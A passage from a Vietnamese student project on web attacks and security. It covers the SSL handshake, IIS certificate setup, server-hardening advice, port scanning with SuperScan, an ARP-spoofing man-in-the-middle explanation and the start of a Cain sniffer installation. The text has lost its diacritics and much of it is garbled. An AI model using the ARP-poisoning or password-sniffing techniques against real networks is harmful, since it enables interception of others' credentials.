SERVERKEYEXCHANGE v gi kt qu tr v server trong thng boCLIENTKEYEXCHANGE. Ln lt server s dng kha ring tng ng
gii m kha mt chnh.
- Nu cc token FORTEZZA c s dng trao i kha, client dn xut
mt kha m ha token (TEK) bng cch s dng KEA. Php tnh KEA cu
client s dng kha chung t chng nhn server cng vi mt s tham s
ring trong token ca client. Client gi cc tham s chung cn thit cho server
cng to TEK, s dng cc tham s ring ca n. N to mt kha mt
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
40/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
40
chnh, bao bc n bng cch s dng TEK v gi kt qucng vi mt s
vector khi to n server nh l mt phn ca thng bo
CLIENTKEYEXCHANGE. Ln lt, server c th gii m kha mt chnh mt
cch thch hp. Thut ton trao i kha ny khng c s dng rng ri.Nu s xc thc client c yu cu, client cng gi mt thng bo
CERTIFICATEVERIFY n server. Thng bo ny c s dng cung cp
s xc thc r rng nh danh ca ngi dng da vo chng nhn cc
nhn. N chc gi theo sau mt chng chclient vn c khnng to ch
k (tt c chng nhn ngoi tr cc chng nhn cha cc tham s
DiffeHallman cnh). Sau cng, client hon tt bc 3 bng cch gi mt
thng bo CHANGECIPHERSPEC v mt thng bo FINISHED tng ng
n server. Thng bo FINISHED lun c gi ngay lp tc sau thng bo
CHANGECIPERSPEC xc nhn rng cc tin trnh trao i kha v xc
thc thnh cng. Thc t, thng bo FINISHED l thng bo u tin vn
c bo v bng cc thut ton mi c thng lng v cc kha
session. N chc thc to v c xc nhn nu nhng kha ny c
ci t mt cchph hp chai pha. Khng i hi sbo nhn thng bo
FINISHED; cc pha c th bt u gi d liu c m ha ngay lp tc sau
khi gi thng bo FINISHED. Vic thc thi SSL Handshake Protocol hon
tt bng vic cng yu cu server gi mt thng bo CHANGECIPHERSPEC
v mt thng bo FINISHED tng ng n client bc 4.
Sau khi s thit lp SSL hon tt, mt ni kt an ton c thit lp gia
client v server. Ni kt ny by gic thc s dng gi d liu ng
dng vn c bao bc bi SSL Record Protocol. Chnh xc hn, d liu ngdng c th c phn on, c nn, hoc c m ha v c xc
thc theo SSL Record Protocol cng nh thng tin trng thi session v n i
kt vn by gi c thit lp (ty thuc vic thc thi SSL Handshake
Protocol).
SSL Handshake Protocol c thc rutst ngn nu client v server quyt
nh tip tc li mt session SSL c thit lp trc (v vn c lu
tr) hoc lp li mt session SSL hin c. Trong trng hp ny, chba dng
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
41/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
41
thng bo v tng cng su thng bo c yu cu. Cc dng thng bo
tng ng c thc tm tt nh sau:
1: C -> S: CLIENTHELLO
2: S -> C: SERVERHELLOCHANECIPHERSPEC
FINISHED
3: S ->C: CHANGECIPHERSPEC
FINISHED
bc 1, client gi mt thng bo CLIENTHELLO n server vn c mt
nh danh session cn c tip tc li. Ln lt server kim tra cache
session ca n tm mt mc tng hp. Nu mt mc tng hp c tm
thy, server mun tip tc li ni kt bn di trng thi session xc nh,
n tr v mt thng bo SERVERHELLO vi cng mt nh danh session
bc 2. Vo thi im ny, c client ln server phi gi cc thng bo
CHANGECIPHERSPEC v FINISHED n nhau bc 2 v 3. Mt khi vic
ti thit lp session hon tt, client v server c th bt u trao i d liu
ng dung.
C chm ha ca SSL:
1. Client pht sinh 1 Session Key ngu nhin khi truy cp n Server
2. Client yu cu Server gi Certificate (gm Public Key ca Server)
3. Client kim tra tnh hp l ca Certificate
4. Nu Certificate ca Server hp l, Client m ha Session Key bng
Public Key ca Server
5. Client gi Session Key m ha cho Server6. Server gii m Session Key c m ha bng Private Key
7. Cc thng tin trao i gia server v client sc m ha v gii m
bng Session Key
Hin nay, khi public mt web site ln internet, p dng c chm haSSLchng ta phi thu SSL Certificate cho Web Server tcc t chc cung cpDigital Certificate nh: Verisign, CyberTrust, EnTrust .Chun b
- My Windows Server 2003
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
42/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
42
- Cit dch v Internet Information Services (IIS)- Hosting Web Site vi ni dung bt k, truy cp vi achhttp://www.MSOpenLab.com
1.To Request Certificate:- Logon Administrator, m Internet Information Services (IIS) Manager, bungWeb Site, chut phi Default Web Site, chn Properties- Hp thoi Default Web Site Properties, qua tab Directory Security, chnServer Certificate .
Hp thoi Welcome to the Web Server Certificate Wizard, chn Next
http://www.msopenlab.com/http://www.msopenlab.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
43/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
43
Hp thoi Server Certificate, chn Create anew certificate, chn Next
Trong hp thoi Delayed or Immediate Request, chn Prepare the request now,but send it later, chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
44/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
44
Hp thoi Name and Security Settings, chn Next
Trong hp thoi Organization Information, nhp thng tin nh hnh bn di,chn Next
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
45/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
45
-Trong hp thoi Your Sites Common Name, nhp www.msopenlab.com vo Common name, chn Next
Hp thoi Geographical Information, nhp thng tin nh hnh bn di, chnNext
http://www.msopenlab.com/http://www.msopenlab.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
46/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
46
Hp thoi Certificate Request File Name, mc nh ng dn dn
C:\certreg.txt, chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
47/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
47
Hp thoi Request File Summary, chn Next, chn Finish .
Trong hp thoi Default Web Site Properties, chn OK, tt tt c ca s.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
48/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
48
2. Xin SSL Certificate t VeriSign.com- M Windows Explorer, copy ni dng ca file C:\certreq.txt
M Internet Explorer, truy cp a chhttp://www.verisign.com, chn Free SSLTrial
http://www.verisign.com/http://www.verisign.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
49/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
49
Trong ca s Free SSL Trial Certificate, nhp y thng tin (*: thng tinbt buc), chn Continue
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
50/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
50
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
51/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
51
Ca s Welcome, chn Continue .
-Ca s tip theo, nhp y thng tin vo phn Technical Contact, chnContinue .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
52/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
52
Trong Select Server Platform, chn Microsoft. Trong Select Version, chnIIS 6.0. Dn ni dung file certreq.txt vo Paste Certificate Signing R******(CSR), optained from your server .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
53/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
53
Trong What do you plan to use this SSL Certificate for?, chn Web Server,chn Continue
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
54/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
54
Trong ca s CRS Information, nhp MSOPENLAB vo Challenge Phrasev Re-enter Challenge Phrase. Nhp cu hi bt kvo Reminder Question,chn Continue
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
55/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
55
Trong ca s Order summary & acceptance, chn Accept
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
56/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
56
Kim tra: xin SSL Certificate thnh cng
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
57/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
57
Cu hnh Trusted Root Certification Authority-ng nhp vo hp mail, kim tra nhn c e-mailt [email protected], chn vo link nh trong hnh bn di.
mailto:[email protected]:[email protected] -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
58/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
58
Trong trang web ca verisign, chn VeriSign CA Certificates
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
59/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
59
Trong trang web ca verisign, chn VeriSign CA Certificates
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
60/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
60
Trong ca s Root CA Certificate, chn Select All, copy tt c ni dung
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
61/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
61
Dn ni dung vo Notepad v save li vi tn ca.cer
M Internet Explorer, vo Tools, chn Internet Options, qua tab Content, chnCertificates
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
62/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
62
Trong hp thoi Certificates, chn Import .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
63/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
63
Hp thoi Welcome to the Certificate Import Wizard, chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
64/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
64
Hp thoi File to Import, chn Browse, tr ng dn n C:\ca.cer, chnNext .
Hp thoi Certificate Store, chn Automatically select the certificate storebased on the type of certificate, chn Next, chn Finish .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
65/98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
66/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
66
Dn ni dung vo Notepad, save li vi tn cert.txt .
M Internet Information Services (IIS) Manager, chut phi Default Web Sitechn Properties- Trong ca s Default Web Site Properties, qua tab Directory Security, chnServer Certificate .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
67/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
67
Hp thoi Welcome, chn Next- Hp thoi Pending Certificate R******, chn Process the pending r****** andinstall the certificate, chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
68/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
68
Hp thoi Process a Pending Request, chn Browse, tr ng dn nC:\cert.txt .
Hp thoi SSL Port, gi mc nh port 443, chn Next 2 ln, chn Finish
Trong hp thoi Default Web Site Properties, chn View Certificate .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
69/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
69
Kim tra Certificate c cp bi Verisign .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
70/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
70
. Kim tra kt qu
-M Internet Explorer, truy cp https://www.MSOpenLab.com, kim tra truycp thnh cng.
https://www.msopenlab.com/https://www.msopenlab.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
71/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
71
2. Cc cng c kho st v tim li webserver
Vnh ai bo vchung cho ton h thng mng (lp 1), gm c h
thng Web.
trin khai lp bo vu tin ny, cc t chc, doanh nghip c th trang
b mt thit ban ninh tch hp (UTM) gm nhiu tnh nng bo mt khc nhau
nh:
Tng la (Firewall) sgip ngn chn cc tn cng tng mng, loi
b cc hnh vi d qut cc im yu bo mt ca cc hiu hnh trn cc
my ch .
Thnh phn ngn chn xm nhp (IPS) gip loi bcc tn cng khai
thc cc im yu ca phn mm ng dng web, phn mm c s d liu, h
iu hnh... Ngoi ra cc thnh phn mng ring o (VPN) v thnh phnqut virus mc gateway sgip h thng c an ton hn.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
72/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
72
- Tng la chuyn dng cho cc ng dng Web .
Sau khi xy dng vnh ai bo v chung, cn trang bthm mt tng la
chuyn dng cho cc ng dng web (lp 2). Tng la ng dng web ny s
kim tra v ngn chn cc tn cng khai thc im yu pht sinh trong qutrnh pht trin website. Ty thuc vo quy m ca t chc, doanh nghip
v/hoc ph thuc vo gi tr ca ti nguyn thng tin trn website m c th
c mt mc u t tng ng cho tng la ng dng web ny.
C 3 la chn:
-i vi cc website m phn ln l thng tin tnh (t thay i), khng
cha cc d liu quan trng cng nh khng c cc giao dch mua bn: cth trang b b sung module phn mm tng la cho ng dng web (nh
Web Intelligence ca Check Point) vo thit ban ninh tch hp UTM ni trn.
-i vi cc website c rt nhiu d liu quan trng mang tnh cht
sng cn ca t chc, doanh nghip, ng thi thng xuyn din ra cc giao
dch trc tuyn, i hi phi c an ton, sn sng cao: nn trang b mt
thit btng la chuyn dng cho ng dng web (nh gii php ca
NetContinuum, mt hng chuyn cung cp thit btng la chuyn dng cho
ng dng web).
--i vi cc website cung cp cc thng tin ni b hoc cng truy nhp
thng tin ca mt t chc, doanh nghip (Web Portal) cho php nhn vin kt
ni vo t bt cu v lm vic bt k thi gian no: ngoi vic trang b lp
bo v chung bng thit ban ninh tch hp, cc t chc, doanh nghip cng
cn xy dng mt cng truy nhp an ton n cc ti nguyn thng tin (v d
s dng thit b Connectra Web Security Gateway ca Check Point).
-i vi an ton h thng nhn chung, Firewall c th bo v h thng
my tnh chng li nhng kt nhp qua khnng ngn chn nhng phin
lm vic t xa (remote login).
-Ngn chn thng tin tbn ngoi (Internet) vo trong mng c bo
v, trong khi cho php ngi s dng hp php c truy nhp t do mng
bn ngoi.Firewall c th phc vnh mt cng ctheo di cc cuc tn cng vi
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
73/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
73
xu tbn ngoi nhm dbo khnng b tn cng trc khi cuc tn cng
xy ra.
Thit ban ninh tch hp hoc thit b chng xm nhp mng :
Sau khi u t hai lp bo vtrn, tng cng an ton bo mt thng tin,t chc, doanh nghip c th bsung thm mt thit ban ninh tch hp hoc
thit b chng xm nhp mng (IPS) chuyn dng (lp 3). Lp ny phn chia
mng bn trong thnh cc phn vng khc nhau v p dng cc chnh sch
ring cho tng phn vng mng nhm ngn chn cc tn cng c ngun gc
tbn trong mng v loi bcc tn cng c thvt qua tng la vo
vng cc my ch quan trng.
Mt s phng php bo v my ch eb Server
Cc my chWeb (Webserver) lun l nhng e da cho cc hacker tm kim
cc thng tin gi trhay gy ri v mt mc ch no . Him hoc thl bt
cci g t kiu tn cng t chi dch v, qung co cc website c ni dung
khng lnh mnh, xo, thay i ni dung cc file hay phn mm cha m
nguy him. Sau y l mt s phng php bo v my ch Web Server :
-t cc Webserver trong vng DMZ. Thit lp firewall khng cho cckt ni ti Webserver trn ton bcc cng, ngoi tr cng 80 (http), cng
443 (https) v cc cng dch vm ang s dng.
- Loi bton bcc dch vkhng cn thit khi Webserver ngay c
dch v truyn tp FTP (chgi li nu tht cn thit). Mi dch vkhng cn
thit s b li dng tn cng h thng nu khng c ch bo mt tt.
- Khng cho php qun tr h thng t xa, trkhi n c ng nhp
theo kiu mt khu chs dng mt ln hay ng kt ni c m ho.
- Gii hn sngi c quyn qun tr hay truy cp mc ti cao (root).
- To cc log file theo di hot ng ca ngi s dng v duy tr cc
log file ny trong mi trng c m ho.
- H thng iu khin log file thng thng c s dng cho bt k
hot ng no. Ci t cc by macro xem cc tn cng vo my ch. To
cc macro chy lin tc hoc t ra c th kim tra tnh nguyn vn ca filepasswd v cc file h thng khc. -Khi cc macro kim tra mt s
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
74/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
74
thay i, chng nn gi mt email ti nh qun l h thng.
-Loi bton bcc file khng cn thit khi th mc cha cc file
kch bn thi hnh: /cgi-bin.
-ng k v cp nht nh kcc bn sa li mi nht van ton,bo mt tcc nh cung cp.
- Nu h thng phi c qun tr txa, i hi mt c ch bo mt
nh bo mt shell, c s dng to ra mt kt ni bo mt. Khng s
dng telnet hay ftp vi user l anynomous (i hi mt username v password
cho vic truy cp) t bt csite khng c chng thc no. Tt hn, hy
gii hn s kt ni trong cc h thng bo mt v cc h thng bn trong
mng Intranet.
-Chy webserver trong cc th mc c t quyn truy cp v
quyn s dng, v vy chc ngi qun tr mi c th truy cp h thng
thc
-Chy server FTP theo ch anonymous (nu h thng cn) trong
mt th mc c t quyn truy cp, khc vi th mc c s dng bi
webserver.
-Thc hin ton b vic cp nht t mng Intranet. Duy tr trang web
ban u trn mi server trn h thng mng Intranet v to cc thay i v
cp nht y; sau mi y cc cp nht ny ln website qua mt kt ni
SSL. Nu thc hin iu ny hng gi, c thtrnh khnng server treo mt
thi gian di.
-Qut Webserver theo nh k vi cc cng cnh ISS hay nmap
tm kim l hng bo mt.-Trang b phn mm pht hin truy nhp tri php ti cc my ch,
t phn mm ny cnh bo cc hnh ng nguy him v bt cc session
ca chng li xem.. Thng tin ny c thgip bn ly c thng tin v
cch thc ph hoi mng, cng nh mc bo mt trong h thng ca bn.
-Tun thcc quy tc nht nh nu trn sgip cho Webserver
c bo v tt hn v ngi qun tr mng khng cn chu ni au u, lo
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
75/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
75
lng v vn an ton my chweb v an ton thng tin cho ton b h
thng.
* .Super Scan :
Chng ta s tin hnh kim tra thng tin trn mng bng cng c Super Scan.
C thhn, chng ta sdng Super Scan qut 1 IP v xc nh c l hng
c thxm nhp vo h thng thng qua cc port m phn mm xc nh m.
Cc bc tin hnh :
- Sau khi down Super Scan vmy, chng ta chy chng trnh nh
hnh di :
-Trong chng trnh c th Scan .
- Hostname/IP: in vo IP mun qut
-Hoc bn cng c th Scan c 1 range IP:
- Start IP : IP bt u
- End IP : IP kt thc
bt u qut ta click vo nt start gc tri bn di
Ngoi ra Super Scan cn c cc options khc nh:
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
76/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
76
- Host and Services Discovery: Dng thay i s port bn mun qut ca
IP hoc da trn danh sch Port list c sn.
- Scan Options: Thay i cc tham shost v services.
- Tools: Cc chc nng kim tra, tm kim thng tin ca 1 IP hoc domain.(Ping, whois, HTTP Header request,)
- Windows Enumeration: Thng tin m rng v IP hoc Domain
(NetBIOS,Mac address, Workstation,)
V d: Khi scan IP 210.245.31.17 ta s nhn c kt qunh hnh di:
y, IP 210.245.31.17 ang m tng cng 6 port: 5 TCP v 1 UDP
Theo nh lit k th cc port TCP ang ml:
- 21 : FTP
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
77/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
77
- 23 : Telnet
- 80 : web
- 443: SSL
- 8001: port ny do Trojan m- xem chi tit kt quhn, ta click vo View HTML Results.
Ty ta sxc nh c cc port m hacker c th li dng xm nhp
v c bin php secure cho cc port ny.
- Mt stnh nng khc ca Super Scan trong phn Tools ping, tracert hay
whois 1 domain
hnh trn ta thu c thng tin khi tracert domain www.itsea.net nh sau:
- Domain ny c IP: 207.210.81.150 v qua 16 hop, server dng hiu hnh
Linux, chy Apache 1.3.36 (unix) ,OpenSSL 0.9.7a
- Ngoi ra cn 1 s chc nng khc khai thc trit nhng thng tin v
http://www.itsea.net/http://www.itsea.net/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
78/98
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
79/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
79
-y l mt dng tn cng rt nguy him, gi l Man In The Middle. Trong
trng hp ny ging nh bt my nghe ln, phin lm vic gia my gi
v my nhn vn din ra bnh thng nn ngi s dng khng h hay bit
mnh b tn cng.b. S lc qu trnh hot ng:
- Trn cng mt mng, Host A v Host B mun truyn tin cho nhau, cc
Packet sc a xung tng Datalink ng gi, cc Host phi ng gi
MAC ngun, MAC ch vo Frame. Nh vy trc khi qu trnh truyn D
liu, cc Host phi hi a chMAC ca nhau.
- Nu nh Host A khi ng qu trnh hi MAC trc, n s gi broadcast gi
tin ARP request cho tt ccc Host hi MAC Host B, lc Host B c
MAC ca Host A, sau Host B chtr li cho Host A MAC ca Host B (ARP
reply).
C 1 Host C lin tc gi ARP reply cho Host A v Host Ba chMAC ca
Host C, nhng li t a chIP l Host A v Host B. Lc ny Host A cngh
my B c MAC l C. Nh vy cc gi tin m Host A gi cho Host B u ba
n Host C, gi tin Host B tr li cho Host A cng a n Host C. Nu Host
C bt chc nng forwarding th coi nh Host A v Host B khng h hay bit
rng mnh b tn cng ARP.
- V d :
Ta c m hnh gm cc host
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
80/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
80
Attacker: l my hacker dng tn cng ARP
IP: 10.0.0.11
MAC: 0000.0000.1011
Server: l my b tn cngIP: 10.0.0.12
MAC: 0000.0000.1012
HostA
IP: 10.0.0.13
MAC: 0000.0000.1013
- u tin, HostA mun gi d liu cho Server, cn phi bit a chMAC
ca Server lin lc. HostA s gi broadcast ARP Request ti tt ccc
my trong cng mng LAN hi xem IP 10.0.0.12 (IP ca Server) c a
chMAC l bao nhiu.
- Attacker v Server u nhn c gi tin ARP Request, nhng chc
Server gi tr li gi tin ARP Reply li cho HostA. ARP Reply cha thng
tin vIP 10.0.0.12 v MAC 0000.0000.1012 ca Server.
- HostA nhn c gi ARP Realy t Server, bit c a chMAC ca
Server l 0000.0000.1012 s bt u thc hin lin lc truyn d liu n
Server. Attacker khng th xem ni dung d liu c truyn gia HostA
v Server.
My Attacker mun thc hin ARP attack i vi my Server. Attacker
mun mi gi tin HostA gi n my Server u c th chp li c
xem trm.
- Attacker thc hin gi lin tc ARP Reply cha thng tin v IP caServer 10.0.0.12, cn a chMAC l ca Attacker 0000.0000.1011.
- HostA nhn c ARP Reply ngh rng IP Server 10.0.0.12 c a ch
MAC l 0000.0000.1011. HostA lu thng tin ny vo bng ARP Cache v
thc hin kt ni.
- Lc ny mi thng tin, d liu HostA gi ti my c IP 10.0.0.12 (l my
Server) s gi qua a chMAC 0000.0000.1011 ca my Attacker.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
81/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
81
3 .S dng phn mm CAIN
- Phn mm Cain l phn mm sniffer hiu qu hin nay. Cung cp tnh
nng ca cain c thcho php sniffer c cung cp thng tin b mt trong h thng mng LAN nh password e-mail, password dch v ftp,
telnet,
a. Yu cu v phn cng :
cng cn trng 10 Mb
Hiu hnh Win 2000/2003/XP
Cn phi c Winpcap
b. Ci t:
- Chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
82/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
82
- Chn next.
- Chn Finish.
Trong qu trnh ci Ct i hi ta phi ci t km bth vin WinPcap.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
83/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
83
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
84/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
84
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
85/98
n mn hc Lp trnh web